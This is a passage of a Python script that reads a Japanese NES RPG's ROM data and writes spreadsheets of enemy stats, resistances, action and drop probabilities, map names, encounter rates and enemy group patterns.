0x17: \"2の巻\", # へルモンキー\n 0x18: \"2の巻\", # シェルビー\n 0x19: \"2の巻\", # へびおんな\n 0x1A: \"2の巻\", # ドラゴンマン\n 0x1B: \"2の巻\", # ぎょろん\n 0x1C: \"2の巻\", # メカタツノコ\n 0x1D: \"ボス\", # タツノコつかい\n 0x1E: \"ボス\", # うつぼうず\n 0x1F: \"3の巻\", # おおとげむし\n 0x20: \"3の巻\", # マグマンゼりー\n 0x21: \"3の巻\", # ひふきガメ\n 0x22: \"3の巻\", # べロべロべー\n 0x23: \"3の巻\", # ヒダシメ\n 0x24: \"3の巻\", # バットクルス\n 0x25: \"3の巻\", # かえんマン\n 0x26: \"3の巻\", # いんねび\n 0x27: \"ボス\", # かえんだいおう\n 0x28: \"4の巻\", # マッドボアー\n 0x29: \"4の巻\", # ひゃっかんいぬ\n 0x2A: \"4の巻\", # ウルフマン\n 0x2B: \"4の巻\", # りトルエイプ\n 0x2C: \"4の巻\", # しろやまた\n 0x2D: \"4の巻\", # へルバット\n 0x2E: \"4の巻\", # くらやみマン\n 0x2F: \"4の巻\", # シャドウマン\n 0x30: \"ボス\", # ムササビだゆう\n 0x31: \"5の巻\", # あまのじゃく\n 0x32: \"5の巻\", # クレイジーカウ\n 0x33: \"5の巻\", # レッドソーサー\n 0x34: \"5の巻\", # しにがみこぞう\n 0x35: \"5の巻\", # にんげんもどき\n 0x36: \"5の巻\", # バトルナイト\n 0x37: \"ボス\", # コウモりだゆう\n 0x38: \"6の巻\", # ララバイかめん\n 0x39: \"6の巻\", # スーパークロン\n 0x3A: \"6の巻\", # シャーぺイン\n 0x3B: \"6の巻\", # サソラム\n 0x3C: \"6の巻\", # コカーメン\n 0x3D: \"6の巻\", # カーメン\n 0x3E: \"6の巻\", # きがマン\n 0x3F: \"ボス\", # ビッグカンカン\n 0x40: \"6の巻\", # マッドミイラ\n 0x41: \"6の巻\", # ファラー\n 0x42: \"6の巻\", # スフインツク\n 0x43: \"ボス\", # ツタンだいおう\n 0x44: \"7の巻\", # パニュロン\n 0x45: \"7の巻\", # ガオウ\n 0x46: \"7の巻\", # アイスマン\n 0x47: \"7の巻\", # ひょうがんだん\n 0x48: \"7の巻\", # ガンテツゾンビ\n 0x49: \"7の巻\", # ゆきひめ\n 0x4A: \"7の巻\", # ダークへッド\n 0x4B: \"7の巻\", # ひょうけつマン\n 0x4C: \"7の巻\", # ひょうがコング\n 0x4D: \"ボス\", # だるまだいし\n 0x4E: \"8の巻\", # へルファイヤー\n 0x4F: \"8の巻\", # どろたぼう\n 0x50: \"8の巻\", # ゾンビー\n 0x51: \"8の巻\", # のろいひめ\n 0x52: \"8の巻\", # ゾンビコウモり\n 0x53: \"8の巻\", # メタルパラソル\n 0x54: \"8の巻\", # あしがるゾンビ\n 0x55: \"8の巻\", # のろいマン\n 0x56: \"8の巻\", # スカルホッパー\n 0x57: \"8の巻\", # ミステりーアイ\n 0x58: \"ボス\", # ゾンビまおう\n 0x59: \"8の巻\", # かねくいだま\n 0x5A: \"8の巻\", # ラーゴン\n 0x5B: \"8の巻\", # モスカルラ\n 0x5C: \"8の巻\", # ダンダン\n 0x5D: \"8の巻\", # キンゾー\n 0x5E: \"8の巻\", # ガキゾンビ\n 0x5F: \"8の巻\", # ブレインソーサ\n 0x60: \"ボス\", # ロボゴールド\n 0x61: \"1の巻\", # キノコング\n 0x63: \"9の巻\", # あかぼうず\n 0x64: \"9の巻\", # ダークネス\n 0x65: \"9の巻\", # まぼろしかめん\n 0x66: \"9の巻\", # ろくろ\n 0x67: \"9の巻\", # まそうりょ\n 0x68: \"9の巻\", # はんにゃ\n 0x69: \"9の巻\", # ドラゴルド\n 0x6A: \"ボス\", # バイオフラワー\n 0x6B: \"9の巻\", # マンイーター\n 0x6C: \"9の巻\", # フラワー\n 0x6D: \"10の巻\", # みらいマン\n 0x6E: \"10の巻\", # ジョックー\n 0x6F: \"10の巻\", # ミンミン\n 0x70: \"10の巻\", # アイアンアイ\n 0x71: \"10の巻\", # ガンダーロボ\n 0x72: \"10の巻\", # レイザータンク\n 0x73: \"ボス\", # ボスガンダー1\n 0x74: \"ボス\", # ボスガンダー2\n 0x75: \"10の巻\", # メガべルガー\n 0x76: \"10の巻\", # レガルゴ\n 0x77: \"10の巻\", # スカイキラー\n 0x78: \"ボス\", # エイりアンドー\n 0x79: \"ボス\", # キラーウルフ\n 0x7A: \"ボス\", # メタルブロック\n 0x7B: \"ボス\", # フライウイドウ\n 0x7C: \"ボス\", # サーべンラガー\n 0x7D: \"ボス\", # マインマスター\n 0x7E: \"オニガランド\", # クレイジーババ\n 0x7F: \"オニガランド\", # まへいもち\n 0x80: \"オニガランド\", # ドグウアーマー\n 0x81: \"オニガランド\", # へビオトコ\n 0x82: \"ボス\", # イヌゾンビ\n 0x83: \"オニガランド\", # あおぼうず\n 0x84: \"オニガランド\", # オニデーモン\n 0x85: \"オニガランド\", # マグマン\n 0x86: \"オニガランド\", # モンスタージジ\n 0x87: \"オニガランド\", # あおきし\n 0x88: \"オニガランド\", # オニタコン\n 0x89: \"ボス\", # サルボス\n 0x8A: \"オニガランド\", # シーサーぺント\n 0x8B: \"オニガランド\", # ブルーアンクル\n 0x8C: \"オニガランド\", # スネークポッド\n 0x8D: \"オニガランド\", # レッドドッグ\n 0x8E: \"オニガランド\", # ブルードッグ\n 0x8F: \"オニガランド\", # バンコパ\n 0x90: \"オニガランド\", # ピーチボーイズ\n 0x91: \"ボス\", # モモタロゾンビ\n 0x92: \"ボス\", # キラーウルフ\n 0x93: \"オーロラ王国\", # グりーンアイ\n 0x94: \"オーロラ王国\", # つるりん\n 0x95: \"オーロラ王国\", # へビーガル\n 0x96: \"オーロラ王国\", # スカイマン\n 0x97: \"オーロラ王国\", # クレバス\n 0x98: \"オーロラ王国\", # グりーンケルプ\n 0x99: \"オーロラ王国\", # イノクラッシュ\n 0x9A: \"オーロラ王国\", # アイスファイヤ\n 0x9B: \"オーロラ王国\", # べムカッター\n 0x9C: \"オーロラ王国\", # がいこつむし\n 0x9D: \"オーロラ王国\", # シャドーマスク\n 0x9E: \"オーロラ王国\", # カニモンス\n 0x9F: \"オーロラ王国\", # アイスストーン\n 0xA0: \"オーロラ王国\", # ゆきみアイス\n 0xA1: \"オーロラ王国\", # ブルーザウルス\n 0xA2: \"オーロラ王国\", # じんめんいわ\n 0xA3: \"オーロラ王国\", # エレキラドン\n 0xA4: \"オーロラ王国\", # ブビ\n 0xA5: \"オーロラ王国\", # キルスライダー\n 0xA6: \"ボス\", # メタルブロック\n 0xA9: \"2の巻\", # しきゃくマン\n 0xAA: \"ボス\", # キンタロゾンビ\n 0xAC: \"ボス\", # ウシまつ\n }.get(enemy_id, \"不明\")\n\n\ndef _fill_enemy(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"敵ID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵名前\"),\n _ColumnStyle(caption=\"初出\"),\n _ColumnStyle(caption=\"基礎命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最小命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最大命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"超力\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"攻撃\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"防御\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"スピード\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"経験値\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"獲得金\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"逃走\"),\n _ColumnStyle(caption=\"行動回数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"回避補正\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ミハギトきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"クルスきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ベトきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"地震系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"火炎系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"水撃系・氷結系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"電撃系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"爆発系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"マフウジきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"マフウジ有効ターン数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ララバイきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ララバイ有効ターン数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"パラパきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"パラパ有効ターン数\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n for i in range(_MAX_ACTIONS_PER_ENEMY):\n header_row.append(_ColumnStyle(caption=f\"敵行動{i + 1}\"))\n header_row.append(_ColumnStyle(caption=f\"敵行動{i + 1}_確率\", cell_alignment=_RIGHT_ALIGNMENT))\n header_row.append(_ColumnStyle(caption=\"ドロップアイテム1\"))\n header_row.append(_ColumnStyle(caption=\"ドロップアイテム2\"))\n header_row.append(_ColumnStyle(caption=\"ドロップアイテム確率\", cell_alignment=_RIGHT_ALIGNMENT))\n header_row.append(_ColumnStyle(caption=\"備考\"))\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"C2\"\n choriki_endurance = {\n 0: \"100%\",\n 1: \"70%\",\n 2: \"30%\",\n 3: \"0%\",\n }\n debuff_endurance = {\n 0: \"100%\",\n 1: \"70%\",\n 2: \"30%\",\n 3: \"0%\",\n }\n tern_bucket = {\n 0: \"2 or 3\",\n 1: \"4 or 5\",\n 2: \"5 or 6\",\n }\n escapable = {\n True: \"可能\",\n False: \"不可\",\n }\n attack_twice = {\n True: \"1 or 2\",\n False: \"1\",\n }\n hittability = {\n 0: 0xC0,\n 1: 0xA0,\n 2: 0x80,\n 3: 0,\n }\n mihagito_endurance = {\n True: \"0%\",\n False: \"40%\",\n }\n kurusu_endurance = {\n True: \"0%\",\n False: \"20%\",\n }\n beto_endurance = {\n True: \"0%\",\n False: \"40%\",\n }\n note_by_enemy_id = {\n 0x78: \"プレイヤーの行動選択後のターン開始時に命の上位バイトが#$7Fに上書きされる。(ターン開始時に命が32513(#$7F01)以上に回復する)\", # エイりアンドー\n }\n rows = []\n for enemy_id in range(1, _ENEMY_ID_COUNT + 1):\n enemy = _get_enemy(prg_rom_bytes, enemy_id)\n enemy_name = _get_enemy_name(prg_rom_bytes, enemy_id)\n mahuuji_endurance = debuff_endurance[enemy.mahuuji_endurance]\n if enemy.mahuuji_endurance == 3:\n assert enemy.mahuuji_effectiveness == 0\n mahuuji_tern_count = \"-\"\n else:\n mahuuji_tern_count = tern_bucket[enemy.mahuuji_effectiveness]\n lullaby_endurance = debuff_endurance[enemy.lullaby_endurance]\n if enemy.lullaby_endurance == 3:\n assert enemy.lullaby_effectiveness == 0\n lullaby_tern_count = \"-\"\n else:\n lullaby_tern_count = tern_bucket[enemy.lullaby_effectiveness]\n parapa_endurance = debuff_endurance[enemy.parapa_endurance]\n if enemy.parapa_endurance == 3:\n assert enemy.parapa_effectiveness == 0\n parapa_tern_count = \"-\"\n else:\n parapa_tern_count = tern_bucket[enemy.parapa_effectiveness]\n row = [\n enemy_id,\n enemy_name.enemy_name.strip(),\n _get_chapter_name_of_enemy(enemy_id),\n enemy.hp,\n enemy.min_hp,\n enemy.max_hp,\n enemy.cp,\n enemy.attack,\n enemy.defense,\n enemy.speed,\n enemy.money,\n enemy.experience,\n escapable[enemy.escapable],\n attack_twice[enemy.attack_twice],\n hittability[enemy.hittability],\n mihagito_endurance[enemy.mihagito_endurance],\n kurusu_endurance[enemy.kurusu_endurance],\n beto_endurance[enemy.beto_endurance],\n choriki_endurance[enemy.choriki_endurance_1],\n choriki_endurance[enemy.choriki_endurance_2],\n choriki_endurance[enemy.choriki_endurance_3_4],\n choriki_endurance[enemy.choriki_endurance_5],\n choriki_endurance[enemy.choriki_endurance_6],\n mahuuji_endurance,\n mahuuji_tern_count,\n lullaby_endurance,\n lullaby_tern_count,\n parapa_endurance,\n parapa_tern_count,\n ]\n enemy_action_pattern = _get_enemy_action_pattern(prg_rom_bytes, enemy.action_pattern_id)\n action_threshold_by_action_id = _aggregate_enemy_action_pattern(enemy_action_pattern)\n sorted_actions = sorted(action_threshold_by_action_id.items(), key=operator.itemgetter(1), reverse=True)\n for i in range(_MAX_ACTIONS_PER_ENEMY):\n if i < len(sorted_actions):\n (action_id, threshold) = sorted_actions[i]\n action_name = _get_action_name(prg_rom_bytes, action_id).action_name.strip()\n row.append(action_name)\n row.append(f\"{round(threshold / (0x100 * 2) * 100, 2):.02f}% ({threshold} / {0x100 * 2})\")\n else:\n row.append(\"-\")\n row.append(\"-\")\n item_drop_pattern = _get_item_drop_pattern(prg_rom_bytes, enemy.item_drop_pattern_id)\n has_drop_item = False\n if item_drop_pattern.drop_item_id_0 == 0:\n row.append(\"-\")\n else:\n has_drop_item = True\n row.append(_get_item_name(prg_rom_bytes, item_drop_pattern.drop_item_id_0).item_name.strip())\n if item_drop_pattern.drop_item_id_1 == 0:\n assert not has_drop_item\n row.append(\"-\")\n else:\n assert has_drop_item\n has_drop_item = True\n row.append(_get_item_name(prg_rom_bytes, item_drop_pattern.drop_item_id_1).item_name.strip())\n if not has_drop_item:\n row.append(\"-\")\n elif item_drop_pattern.item_drop_threshold == 0:\n row.append(\"100.00%\")\n else:\n row.append(f\"{round(item_drop_pattern.item_drop_threshold / 0x100 * 100, 2):.02f}% ({item_drop_pattern.item_drop_threshold} / {0x100})\")\n row.append(note_by_enemy_id.get(enemy_id, \"-\"))\n rows.append(row)\n\n def _get_sort_key(row: List[Any]) -> Tuple[int, int]:\n enemy_id = row[0]\n enemy_chapter_priority = [\n \"1の巻\",\n \"2の巻\",\n \"3の巻\",\n \"4の巻\",\n \"5の巻\",\n \"6の巻\",\n \"7の巻\",\n \"8の巻\",\n \"9の巻\",\n \"10の巻\",\n \"オニガランド\",\n \"オーロラ王国\",\n \"ボス\",\n \"不明\",\n ].index(row[2])\n return (enemy_chapter_priority, enemy_id)\n\n for row in sorted(rows, key=_get_sort_key):\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _get_encounter_threshold(prg_rom_bytes: bytes, encounter_threshold_id: int) -> int:\n assert 0 <= encounter_threshold_id <= 7\n if encounter_threshold_id == 0:\n return 0\n return prg_rom_bytes[0x00FD7D + (encounter_threshold_id - 1)]\n\n\ndef _fill_map(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n description_by_map_id = {\n 0x0000: \"ワールドマップ\",\n 0x0001: \"オニガランドワールドマップ\",\n 0x0002: \"オーロラ王国ワールドマップ\",\n 0x0004: \"柳生の里\",\n 0x0008: \"尾張の町:奉行所1階\",\n 0x0009: \"尾張の町:奉行所地下牢\",\n 0x0025: \"アザラシ村とゆきおとこ村の間の洞窟\",\n 0x0026: \"オーロラ村とアザラシ村の間の洞窟2\",\n 0x0028: \"浪速の都:越後屋への地下通路(左から右)\",\n 0x002A: \"なまず大明神:入り口の社\",\n 0x002B: \"なまず大明神:おおなまずのフロア\",\n 0x002C: \"からくり城:1階\",\n 0x002E: \"からくり城:地下1階牢屋\",\n 0x0030: \"柳生の里(江戸の町崩壊後)\",\n 0x0031: \"からくり城:入り口の細い通路\",\n 0x0035: \"柳生の里:但馬邸(江戸の町崩壊後)\",\n 0x003A: \"シードラゴン:縦に長い階段があるフロア\",\n 0x003B: \"シードラゴン:最下層(水の流れているフロア)\",\n 0x003C: \"シードラゴン:一番上の層の右の部屋・3番目の層の右の部屋(何も無い部屋)\",\n 0x003D: \"シードラゴン:乙姫の前の人が7人いる部屋\",\n 0x003E: \"シードラゴン:たつのこつかいのフロアの1つ前の宝箱が6個ある部屋\",\n 0x003F: \"シードラゴン:うつぼうずのフロア\",\n 0x0040: \"龍宮からシードラゴンへの通路1\",\n 0x0041: \"シードラゴン:入ってすぐのフロア\",\n 0x0042: \"シードラゴン:最下層からうつぼうずの途中の部屋1\",\n 0x0043: \"龍宮\",\n 0x0044: \"シードラゴン:たつのこつかいのいる部屋\",\n 0x0045: \"シードラゴン:一番上の層の左の部屋・2番目の層の左の部屋(たるが2個ある部屋)\",\n 0x0047: \"シードラゴン:2番目の層の真ん中の部屋・3番目の層の左の部屋(たるが5個ある部屋)\",\n 0x0048: \"シードラゴン:2番目の層の右の部屋(うつぼのカギがある部屋)\",\n 0x004A: \"龍宮からシードラゴンへの通路2\",\n 0x004C: \"シードラゴン:最下層からうつぼうずの途中の部屋2\",\n 0x004D: \"シードラゴン:最下層からうつぼうずの途中の部屋3\",\n 0x004E: \"シードラゴン:最下層からうつぼうずの途中の部屋4\",\n 0x004F: \"シードラゴン:最下層からうつぼうずの途中の部屋5\",\n 0x0050: \"火炎城:フロア1(火炎城最初のフロア)\",\n 0x0051: \"暗闇城:地下4階(こうもりだゆうのフロア)\",\n 0x0053: \"龍の祠(さばのすけで龍宮の入り口を見つけるフロア)\",\n 0x0054: \"のろい城:2階\",\n 0x0056: \"火炎城:フロア2\",\n 0x0058: \"火炎城:フロア3\",\n 0x0059: \"火炎城:フロア4(横1列のフロア)\",\n 0x005A: \"氷結城:左の塔4階\",\n 0x005B: \"氷結城:右の塔4階\",\n 0x005C: \"イワンのだっしゅつ\",\n 0x005D: \"龍宮への入り口の次の真っ黒のフロア(じゅうべえ落下)\",\n 0x005F: \"シードラゴン:乙姫の部屋\",\n 0x0060: \"火炎城:フロア5\",\n 0x0061: \"暗闇城:地下1階(入ってすぐのフロア)\",\n 0x0062: \"暗闇城:地下2階\",\n 0x0063: \"暗闇城:地下3階(牢屋)\",\n 0x0064: \"暗闇城:地下2階(ヘルバットのフロア)\",\n 0x0065: \"浪速の都(からくり城攻略前の暗い状態)\",\n 0x0067: \"浪速の都:越後屋からからくり城への地下通路(下から上)\",\n 0x0068: \"飢餓城:1階\",\n 0x006B: \"浪速の都:���後屋\",\n 0x006E: \"飢餓城:2階\",\n 0x006F: \"飢餓城:3階(スフインツクのフロア)\",\n 0x0070: \"飢餓城:地下1階\",\n 0x0071: \"飢餓城:3階\",\n 0x0072: \"飢餓城:3階(ビッグカンカンからスフインツクの間の通路)\",\n 0x0073: \"飢餓城:4階(ツタンだいおうのフロア)\",\n 0x0074: \"飢餓城:ビッグカンカンのフロア\",\n 0x0076: \"氷結城:左の塔2階\",\n 0x0077: \"氷結城:左の塔3階\",\n 0x007B: \"氷結城:5階(メガトンコインを持っていると落ちてしまうところ)\",\n 0x007C: \"氷結城:だるまたいしのいるフロア\",\n 0x007D: \"氷結城:右の塔1階\",\n 0x007E: \"氷結城:右の塔3階\",\n 0x0083: \"かぶとがに大明神:入り口の社\",\n 0x0084: \"かぶとがに大明神:内部\",\n 0x0085: \"安芸の町\",\n 0x0086: \"伊予の町\",\n 0x0088: \"伊予の町から土佐の町への地下道\",\n 0x0089: \"宇宙(タコリアンのUFOでの移動画面)\",\n 0x008A: \"つちのこ大明神\",\n 0x008B: \"土佐の町(シードラゴン攻略前)\",\n 0x008D: \"のろい城:地下1階\",\n 0x008E: \"のろい城:1階(入ってすぐのフロア)\",\n 0x008F: \"のろい城:1階\",\n 0x0090: \"のろい城:3階(棺桶が多いフロア)・4階\",\n 0x0091: \"のろい城:5階(ゾンビまおうのフロア)\",\n 0x0092: \"のろい城:3階(牢屋のあるフロア)\",\n 0x0094: \"のろい城:ゾンビマシン\",\n 0x0097: \"岬の小屋(さばのすけのいるフロア)\",\n 0x0098: \"呉別府の渡し\",\n 0x0099: \"異人の町\",\n 0x009A: \"隼人の渡し\",\n 0x00A2: \"モンゴレンの町:あおいほんがあるフロア\",\n 0x00A5: \"オーロラ村とアザラシ村の間の洞窟1\",\n 0x00A6: \"黄金洞窟\",\n 0x00A8: \"ゆきおとこ村北のガンちゃんで岩を退けるフロア\",\n 0x00A9: \"浪速の都:越後屋の隠し通路部屋\",\n 0x00AC: \"未来城:左の塔上層1階\",\n 0x00AD: \"未来城:右の塔上層(最下層へ落下させられるフロア)\",\n 0x00AF: \"隠れ湯\",\n 0x00B0: \"富士山への地下通路\",\n 0x00B8: \"未来城:パームロケットが貰える部屋\",\n 0x00BD: \"ミロクの洞窟\",\n 0x00BE: \"未来城:外観(入ってすぐのフロア)\",\n 0x00C0: \"未来城:格納庫(床下パネルを調べながら進むフロアの途中にある上下に入り口のある部屋)\",\n 0x00C4: \"未来城:左の塔下層(左の塔入ってすぐのフロア)\",\n 0x00C5: \"未来城:左の塔最上階(ボスガンダー1のフロア)\",\n 0x00C9: \"未来城:中央の橋(パームロケットを使うフロア)\",\n 0x00CA: \"未来城:右の塔(上層から最下層への落下画面)\",\n 0x00CB: \"未来城:右の塔最下層(ボスガンダー2のフロア)\",\n 0x00CF: \"未来城:格納庫(ドールのカギを使い入ってすぐのフロア)\",\n 0x00D6: \"未来城:格納庫(床下パネルを調べながら進むフロア)\",\n 0x00DC: \"未来城:中央の塔(マインマスターのフロア)\",\n 0x00E0: \"未来城:中央の塔(マインマスターのフロアのひとつ前のフロア)\",\n 0x00E1: \"モモタロゾンビの城1階\",\n 0x00E2: \"モモタロゾンビの城2階\",\n 0x00E3: \"モモタロゾンビの城3階\",\n 0x00E5: \"オーロラ村:王宮\",\n 0x00E6: \"未来城:左の塔上層2階\",\n 0x00E7: \"未来城:左の塔上層3階\",\n 0x00E8: \"未来城:左の塔上層4階\",\n 0x00E9: \"未来城:左の塔上層5階\",\n 0x00EA: \"未来城:右の塔最上階\",\n 0x00EB: \"未来城:右の塔最上階-1階\",\n 0x00EC: \"ゆきおとこ村からクーラーの洞窟の間の洞窟\",\n 0x00ED: \"ゆきおとこ村\",\n 0x00EE: \"北の洞窟:入ってすぐのフロア\",\n 0x00EF: \"北の洞窟:2番目のフロア\",\n 0x00F0: \"オーロラ村\",\n 0x00F1: \"モモタロゾンビの城4階\",\n 0x00F2: \"モモタロゾンビの城5階\",\n 0x00F3: \"クーラーの洞窟:入ってすぐのフロア\",\n 0x00F4: \"クーラーの洞窟:メタルブロックのいるフロア\",\n 0x00F5: \"隠れ湯:みかづきの部屋\",\n 0x00F6: \"薩摩の町(火炎城攻略前)\",\n 0x00F7: \"薩摩の町(かえんだいおう戦後)\",\n 0x00F8: \"薩摩の町(かえんだいおう潜伏時)\",\n 0x00FC: \"安芸の町:かごちゃんの部屋\",\n 0x00FD: \"琉球の村\",\n 0x00FE: \"琉球の村から火炎城への地下道\",\n 0x0100: \"屋久島\",\n 0x0101: \"屋久島:杉の子大明神\",\n 0x0102: \"壱岐(天狗のいるフロ���)\",\n 0x0103: \"オロ島(シロのいるフロア)\",\n 0x0104: \"門司の村\",\n 0x0105: \"門司の村:鬼の涙を使う穴がある部屋\",\n 0x0106: \"門司の村:鬼の涙を使うフロア\",\n 0x0107: \"下関の村\",\n 0x010A: \"黄泉の洞窟:入ってすぐのフロア\",\n 0x010C: \"黄泉の洞窟:エイリアンドール跡地\",\n 0x010D: \"カムカムの渡し\",\n 0x010E: \"黄泉の洞窟:タコリアンのいるフロア\",\n 0x010F: \"プーサンの村\",\n 0x0110: \"暗闇城から黄泉の洞窟への地下通路\",\n 0x0111: \"異星の廃都\",\n 0x0112: \"長門の村\",\n 0x0113: \"コンコンの町\",\n 0x0116: \"ホルクロア:まがつたまがあるフロア\",\n 0x0117: \"白ウサギ大明神\",\n 0x0118: \"ジャンパイの町\",\n 0x011A: \"ポキン\",\n 0x011C: \"クーロン城:入ってすぐのフロア\",\n 0x011D: \"クーロン城:地下牢\",\n 0x011E: \"クーロン城:コスモトロンがあるフロア\",\n 0x011F: \"ソウレンの村\",\n 0x0121: \"シーサンプータ\",\n 0x0122: \"三里の長城\",\n 0x0123: \"モンゴレンの町\",\n 0x0125: \"ハルビンタの村\",\n 0x0127: \"からくり城(ワールドマップから入った場合;入り口が無い)\",\n 0x0128: \"コウモリ洞窟(しんかげがあるフロア)\",\n 0x012A: \"ウラジョスト\",\n 0x012C: \"ババロフの町\",\n 0x012D: \"青い石碑(ノルンのなみだを使うフロア)\",\n 0x012E: \"最果ての洞窟(イワンの埋まっているフロア)\",\n 0x012F: \"石狩の町\",\n 0x0130: \"北の神々の祠\",\n 0x0131: \"まりもの里\",\n 0x0133: \"函館の村\",\n 0x0134: \"りんご村\",\n 0x0135: \"イタコ村\",\n 0x0137: \"十和田の石碑\",\n 0x0138: \"なんぶの町\",\n 0x013C: \"氷結城:入り口\",\n 0x013D: \"のろい城:入り口\",\n 0x013E: \"あきんどタウン\",\n 0x013F: \"ミミズク大明神\",\n 0x0140: \"いけない渡し\",\n 0x0142: \"あわの村\",\n 0x0143: \"江戸の町\",\n 0x0146: \"エンディング:マインマスター戦後のフロア\",\n 0x0147: \"シバレンの村\",\n 0x0148: \"のろい城:5階からゾンビマシンの間の移動\",\n 0x014D: \"千里の長城\",\n 0x014E: \"富士山\",\n 0x014F: \"ホルクロア\",\n 0x0150: \"薩摩の町の右下の火山\",\n 0x0152: \"しろくま村\",\n 0x0156: \"アザラシ村\",\n 0x0158: \"シロ編エンディングのスギ\",\n 0x0159: \"北の洞窟:ガンちゃんがいるフロア\",\n 0x015A: \"ミミナリ島の祠1階\",\n 0x015B: \"ミミナリ島の祠2階(キンタロゾンビのフロア)\",\n 0x015C: \"トンカチ島の祠(チューリップ)\",\n 0x015D: \"トンカチ島の祠(チューリップで転送後)\",\n }\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"マップID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"マップ説明\"),\n _ColumnStyle(caption=\"敵グループパターンリストID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵エンカウント確率\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for map_id in range(0, _MAP_ID_COUNT):\n map_data = _get_map(prg_rom_bytes, map_id)\n if map_id in (0x00, 0x01, 0x02):\n # 0x00: ワールドマップ\n # 0x01: オニガランドワールドマップ\n # 0x02: オーロラ王国ワールドマップ\n encounter_rate = \"移動先のマスの種類により変わる\"\n else:\n encounter_threshold = _get_encounter_threshold(prg_rom_bytes, map_data.encounter_threshold_id)\n encounter_rate = f\"{round(encounter_threshold / 0x100 * 100, 2):.02f}% ({encounter_threshold} / {0x100})\"\n row = [map_id, description_by_map_id.get(map_id, \"\"), map_data.enemy_group_pattern_list_id, encounter_rate]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _aggregate_enemy_action_pattern_ids(enemy_group_pattern_ids: Sequence[int]) -> Sequence[Tuple[int, int]]:\n return tuple((enemy_group_pattern_id, len(tuple(ids))) for enemy_group_pattern_id, ids in itertools.groupby(sorted(enemy_group_pattern_ids)))\n\n\ndef _fill_enemy_group_pattern_list(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"敵グループパターンリストID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵グループパターンID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵グループパターンリスト内確率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵合計数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ1敵名前\"),\n _ColumnStyle(caption=\"グループ1敵数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ2敵名前\"),\n _ColumnStyle(caption=\"グループ2敵数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ3敵名前\"),\n _ColumnStyle(caption=\"グループ3敵数\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for enemy_group_pattern_list_id in range(0, _ENEMY_GROUP_PATTERN_LIST_ID_COUNT):\n enemy_group_pattern_list = _get_enemy_group_pattern_list(prg_rom_bytes, enemy_group_pattern_list_id)\n enemy_group_pattern_ids_count = _aggregate_enemy_action_pattern_ids(enemy_group_pattern_list.enemy_group_pattern_ids)\n sum_enemy_group_pattern_ids_count = sum(item[1] for item in enemy_group_pattern_ids_count)\n if sum_enemy_group_pattern_ids_count:\n for enemy_group_pattern_id, count in enemy_group_pattern_ids_count:\n row: List[Union[int, str]] = [\n enemy_group_pattern_list_id,\n enemy_group_pattern_id,\n ]\n rate = f\"{round(count / sum_enemy_group_pattern_ids_count * 100, 2):.02f}% ({count} / {sum_enemy_group_pattern_ids_count})\"\n row.append(rate)\n enemy_group_pattern = _get_enemy_group_pattern(prg_rom_bytes, enemy_group_pattern_id)\n 